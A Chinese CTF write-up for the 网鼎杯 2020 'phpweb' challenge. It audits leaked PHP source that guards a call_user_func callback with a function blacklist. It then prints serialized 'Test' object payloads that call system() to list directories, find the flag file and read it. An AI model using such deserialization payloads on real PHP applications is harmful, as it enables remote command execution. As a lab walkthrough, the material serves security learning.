反序列化 [网鼎杯 2020 朱雀组]phpweb 1
打开题目
我们发现这个页面一直在不断的刷新
我们bp抓包一下看看
我们发现index.php用post方式传了两个参数上去,func和p
我们需要猜测func和p两个参数之间的关系,可以用php函数MD5测一下看看
我们在响应处得到了一串密文,md5解密一下看看
发现页面回响的内容就是123的md5加密后的内容
那我们直接看看能不能执行system函数
可以看到system函数被过滤掉了
那我们尝试一下能不能直接读取到网站源代码
file_get_contents()
得到
代码如下
<?php$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");function gettime($func, $p) {$result = call_user_func($func, $p);$a= gettype($result);if ($a == "string") {return $result;} else {return "";}}class Test {var $p = "Y-m-d h:i:s a";var $func = "date";function __destruct() {if ($this->func != "") {echo gettime($this->func, $this->p);}}}$func = $_REQUEST["func"];$p = $_REQUEST["p"];if ($func != null) {$func = strtolower($func);if (!in_array($func,$disable_fun)) {echo gettime($func, $p);}else {die("Hacker...");}}?>我们代码审计一下
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];if ($func != null) { //判断func不为空
$func = strtolower($func); //将func转换为小写
if (!in_array($func,$disable_fun)) { //搜索func是否含有黑名单的值
echo gettime($func, $p); //如果func没有存在黑名单的值,就执行gettime函数
}else {
die("Hacker..."); //有则输出Hacker
function gettime($func, $p) {
$result = call_user_func($func, $p); //这里可以看出是回调函数
$a= gettype($result); //这里用gettype函数对result处理后赋值给a
if ($a == "string") { //如果a的类型是字符串
return $result; //返回reslut的结果
} else {return "";} //否则返回空值
那咱们就可以使用反序列化,因为我们这个命令是用不了的,func有很多黑名单限制
构造payload
<?php
class Test {var $p = "ls";var $func = "system";
}
$a = new Test();
echo serialize($a);
?>
用phpstudy打开得到payload
payload为
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}
得到
修改payload
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}
还是没找到flag
继续修复payload,其中 flag* 是一个通配符,表示以 "flag" 开头的文件名。
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}
直接读取flag
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}
或者readfile
func=readfile&p=/tmp/flagoefiu4r93
知识点
- 读取网站源代码的函数有
file_get_contents()
show_source()
highlight_file()
- strtolower()函数
在PHP中,字符串函数strtolower () 将字符串转化为小写
- in_array()函数
in_array() 函数搜索数组中是否存在指定的值。
- call_user_func函数
call_user_func — 把第一个参数作为回调函数调用
详情参考:PHP: call_user_func - Manual
- gettype函数
gettype()函数,必须先给它传递一个变量。它将确定变量的类型并且返回一个包含类型名称的字符串:bool、int、double、string、array、object和resource。如果变量类型不是标准类型之一,该函数就会返回“ unknown type(未知类型)”。
- 读取文件内容的命令
cat filename
readfile filename
- 查找文件的命令
详情见:Linux下查找文件(find、grep命令)_linux查找文件_GG_Bond19的博客-CSDN博客
find 路径 -name "文件名"
例如
find / -name flag*
其中
flag*是一个通配符,表示以 "flag" 开头的文件名。find / -name .*txt
其中
.*txt是一个通配符,表示以 ".txt" 结尾的隐藏文件
相关文章:
反序列化 [网鼎杯 2020 朱雀组]phpweb 1
打开题目 我们发现这个页面一直在不断的刷新 我们bp抓包一下看看 我们发现index.php用post方式传了两个参数上去,func和p 我们需要猜测func和p两个参数之间的关系,可以用php函数MD5测一下看看 我们在响应处得到了一串密文,md5解密一下看看 发…...
Java 何时会触发一个类的初始化
Java 何时会触发一个类的初始化? 使用new关键字创建对象访问类的静态成员变量 或 对类的静态成员变量进行赋值调用类的静态方法反射调用类时,如 Class.forName()初始化子类时,会先初始化其父类(如果父类还没有进行过初始化的话&a…...
我的记事本
url uniform resource locator. 统一资源定位符 请求状态码 1XX:信息响应 2XX:成功响应 3XX:重定向消息 4XX:客户端错误响应 5XX:服务器端错误响应 IP地址分类 本机回环IP地址:127.0.0.1 ~ 127.255.255.254 局域网IP(私网IP) 192.168.0.0 &am…...
)
GO设计模式——4、单例模式(创建型)
目录 单例模式(Singleton Pattern) 优缺点 使用场景 饿汉式和懒汉式单例模式 单例模式(Singleton Pattern) 单例模式(Singleton Pattern)是一个类只允许创建一个对象(或者实例ÿ…...
我对迁移学习的一点理解——领域适应(系列3)
文章目录 1. 领域适应(Domain Adaptation)的基本概念2.领域适应(Domain Adaptation)的目标3.领域适应(Domain Adaptation)的实现方法4.领域适应(Domain Adaptation)的可以解决的问题…...
【openssl】RSA 生成公钥私钥 |通过私钥获取公钥
通过博客:Window系统如何编译openssl 编译出openssl.exe(位于apps文件夹下)。 现在需要使用它获得公钥私钥、通过私钥获取公钥 目录 说明!!! 一.定位openssl.exe目录 二、进入命令cmd 三、生成私钥 …...
MongoDB的删除文档、查询文档语句
本文主要介绍MongoDB的删除文档、查询文档命令语句。 目录 MongoDB删除文档MongoDB查询文档 MongoDB删除文档 MongoDB是一种基于文档的NoSQL数据库,它使用BSON格式存储文档。删除文档是MongoDB数据库中的常见操作之一。 下面是MongoDB删除文档的详细介绍和示例&am…...
-trait)
Rust编程语言入门教程(三)-trait
文章目录 Rust编程语言入门教程(三)-trait什么是 trait?trait使用举例 Rust编程语言入门教程(三)-trait 什么是 trait? trait 是 Rust 中的接口,它定义了类型使用这个接口的行为。你可以类比到…...
LeetCode-1566. 重复至少 K 次且长度为 M 的模式【数组 枚举】
LeetCode-1566. 重复至少 K 次且长度为 M 的模式【数组 枚举】 题目描述:解题思路一:题意就是找出长度为m且连续重复k次的子数组。解题思路就是暴力枚举加剪枝。解题思路二:思路差不多解题思路三:0 题目描述: 给你一个…...
QT5.4.1无法打开文件
问题描述:起初是在QT代码中运行打开文件代码: QString gFilename QFileDialog::getOpenFileName(this,"open File",path,"*", nullptr,QFileDialog::DontUseNativeDialog);时,出现了堵塞情况,经过多次实验一…...
【1day】金和OA某接口存在未授权访问漏洞
注:该文章来自作者日常学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与作者无关。 目录 一、漏洞描述 二、影响版本 三、资产测绘 四、漏洞复现...
使用Rust 构建C 组件
协议解析,这不就很快了,而且原生的标准库红黑树和avl 树支持,异步tokio 这些库,编写应用组件就很快了 rust 标准库不支持 unix 的消息队列,但是支持 shm 和 uds,后者从多方面考虑都比,消息队列更…...
AI:大模型技术
Prompt Prompt(提示)是一种在人工智能领域,特别是在自然语言处理和聊天机器人中常用的技术。它是一种输入,用于激发人工智能模型生成相应的输出。在聊天机器人中,用户输入的问题或请求就是提示,而聊天机器…...
揭开WPF里面XAML可以通过http引入命名空间的神秘面纱
前言 做WPF开发这么久,其实一直对头部引入命名空间有些疑问,为啥官方提供的库通过xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"引入,而我自己开发的就只能通过 xmlns:local="clr-namespace:Darren.Wpf.MainModule.Views"来引入…...
什么是高防IP,高防IP该如何选择。
高防IP,指的是高防御能力的IP地址。在互联网的世界里,网络安全问题成为一个重要的话题。作为一个用户,你是否曾遇到过被黑客攻击造成的网站瘫痪、信息泄露等问题?如果你是一个企业,你是否考虑过自己公司的网站和业务的…...
Linux 进程
文章目录 进程定义进程的描述查看进程方法进程状态进程优先级进程相关概念补充 进程定义 大多数的说法:进程是计算机中正在运行的程序的实例。它是操作系统对程序的一种抽象,用于管理和调度程序的执行。 个人理解: 从OS(操作系统)开始说起,…...
Docker部署开源分布式任务调度平台DolphinScheduler并实现远程访问办公
文章目录 前言1. 安装部署DolphinScheduler1.1 启动服务 2. 登录DolphinScheduler界面3. 安装内网穿透工具4. 配置Dolphin Scheduler公网地址5. 固定DolphinScheduler公网地址 前言 本篇教程和大家分享一下DolphinScheduler的安装部署及如何实现公网远程访问,结合内…...
SQL语言重温
数据库语言重温 笔记背景SQL教程一些最重要的 SQL 命令SQL WHERE 子句SQL AND & OR 运算符SQL ORDER BY 关键字 笔记背景 由于工作需要,现重温简单SQL语言,笔记记录如下。 SQL教程 SQL(Structured Query Language:结构化查询语言&…...
Java学习手册——第五篇数据类型
数据类型:是数据化的基石,如果没有数据类型怎么表示呢?比如年龄可以用整数:18岁。如果有更好的表示方式大家可以留言哟~ 在举个例子就是姓名,我们需要用字符串的形式来表示。这就是数据类型的魅力,而又有同…...
机器学习算法性能评估常用指标总结
考虑一个二分问题,即将实例分成正类(positive)或负类(negative)。对一个二分问题来说,会出现四种情况。如果一个实例是正类并且也被 预测成正类,即为真正类(True positive࿰…...
3个颠覆性策略实现网站到Figma设计的智能双向转换
3个颠覆性策略实现网站到Figma设计的智能双向转换 【免费下载链接】figma-html Convert any website to editable Figma designs 项目地址: https://gitcode.com/gh_mirrors/fi/figma-html 你是否曾为设计还原度低、开发周期长、团队协作效率低下而困扰?Figm…...
自然语言理解在AI原生应用领域的关键作用
自然语言理解在AI原生应用领域的关键作用关键词:自然语言理解(NLU)、AI原生应用、大语言模型、多模态交互、意图识别、情感分析、智能交互摘要:本文将深入探讨自然语言理解(NLU)如何成为AI原生应用的“大脑…...
 + 微信小程序登录的全流程(附排错清单))
从零到上线:手把手教你调试若依(RuoYi) + 微信小程序登录的全流程(附排错清单)
若依框架与微信小程序登录集成实战指南 在当今移动互联网时代,微信小程序已成为企业服务用户的重要入口。本文将深入探讨如何基于若依(RuoYi)这一流行的Java快速开发框架,实现与微信小程序的一键登录功能集成,并重点解决开发过程中可能遇到的…...
给OpenClaw小龙虾喂点 “数据库饲料”,它竟能替你加班到天亮?
目录 💡DBA 的痛,龙虾不懂 🦞 给“龙虾”喂点“硬菜” 📍 成为首批体验官,有福利 最近大家都在养龙虾。 龙虾越养越聪明,写代码、查资料、做分析……什么都能干。 但有一件事,现在的龙虾还…...
从Google Drive下载文件的终极解决方案:gdrivedl实战指南
从Google Drive下载文件的终极解决方案:gdrivedl实战指南 【免费下载链接】gdrivedl Google Drive Download Python Script 项目地址: https://gitcode.com/gh_mirrors/gd/gdrivedl 你是否曾经遇到过这样的情况:需要从Google Drive下载一个大文件…...
5分钟掌握Fideo:终极免费直播录制软件使用指南
5分钟掌握Fideo:终极免费直播录制软件使用指南 【免费下载链接】fideo-live-record A convenient live broadcast recording software! Supports Tiktok, Youtube, Twitch, Bilibili, Bigo!(一款方便的直播录制软件! 支持tiktok, youtube, twitch, 抖音,…...
Kubernetes与GitOps最佳实践
Kubernetes与GitOps最佳实践 1. GitOps概述 GitOps是一种基于Git的持续部署方法,它将基础设施和应用配置存储在Git仓库中,并通过自动化工具来实现部署。GitOps的核心原则是: Git作为单一事实来源:所有配置变更都通过Git进行版本控…...
Planetscale:免费云数据库的快速入门与实战指南
1. Planetscale是什么?为什么开发者都在用? 第一次听说Planetscale时,我也和大多数开发者一样好奇:这个号称"开发者友好"的云数据库到底有什么特别?用了半年后终于明白,它就像是数据库界的GitHub…...
)
PyTorch升级1.10.1后GPU失效?3分钟搞定CUDA环境回滚(以Colab对比为例)
PyTorch 1.10.1 GPU失效排查与CUDA环境精准回滚指南 当你满心欢喜地升级到PyTorch最新版本1.10.1,准备继续你的深度学习项目时,突然发现GPU无法正常工作——这种"昨天还能用,今天突然报错"的场景让许多开发者抓狂。本文将带你深入分…...
)
实测Claude 4.5 Opus重构“屎山”代码:手把手教你用AI给遗留项目做外科手术(附前后对比与单元测试生成)
实测Claude 4.5 Opus重构“屎山”代码:手把手教你用AI给遗留项目做外科手术(附前后对比与单元测试生成) 接手一个满是"祖传代码"的老旧项目,就像被丢进一座迷宫——变量命名像密码,函数逻辑像意大利面&…...